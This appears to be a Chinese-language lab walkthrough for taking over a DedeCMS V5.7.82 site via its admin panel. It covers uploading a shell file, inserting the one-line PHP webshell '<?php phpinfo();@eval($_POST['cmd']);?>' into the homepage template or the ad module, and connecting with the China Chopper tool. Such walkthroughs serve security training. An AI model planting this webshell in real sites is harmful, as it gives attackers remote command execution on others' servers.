DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
hwscom3 分钟前
emlog最新跨站脚本漏洞(CNVD-2025-01607、CVE-2024-13140)
web安全
网络安全Jack31 分钟前
网络安全用centos干嘛 网络安全需要学linux吗
linux·web安全·centos
网络安全King1 小时前
网络安全讲座之一:网络安全的重要性
网络·安全·web安全
山兔12 小时前
22.3、IIS安全分析与增强
安全
娶个名字趴2 小时前
网络编程(TCP/UDP)
java·服务器·网络·网络协议·tcp/ip·udp·java-ee
霜雪殇璃2 小时前
(定时器,绘制事件,qt简单服务器的搭建)2025.2.11
运维·服务器·qt·学习
人7863 小时前
LVSNAT服务搭建
linux·服务器·网络
Lightning-py3 小时前
工具-screen-管理终端会话(服务器长时间运行任务)
linux·运维·服务器·前端·chrome
林的快手3 小时前
HTML 简介
java·服务器·前端·算法·spring·html
fly-iot4 小时前
【openresty服务器】:源码编译openresty支持ssl,增加service系统服务,开机启动,自己本地签名证书,配置https访问
服务器·ssl·openresty